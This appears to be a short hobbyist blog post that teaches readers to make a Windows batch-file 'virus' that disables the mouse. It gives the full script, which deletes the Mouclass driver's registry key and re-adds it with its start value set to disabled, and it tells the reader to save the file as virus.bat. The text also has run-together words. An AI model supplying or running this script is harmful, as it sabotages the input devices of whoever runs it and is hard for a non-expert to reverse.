0
I had previously posted on making differentbatch fileslike matrix effect,openingno ofwebsiteswith one clickwhich were interesting and completely harmless but today we will be making a batch virus which is harmfull it willdisable your mouseso think before trying it on yourself. OpenNotepadand copy below codes rem --------------------------------- remDisable Mouse set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" reg delete %key% reg add %key% /v Start /tREG_DWORD /d 4 rem --------------------------------- Save this file asvirus.bat Done you just created your virus.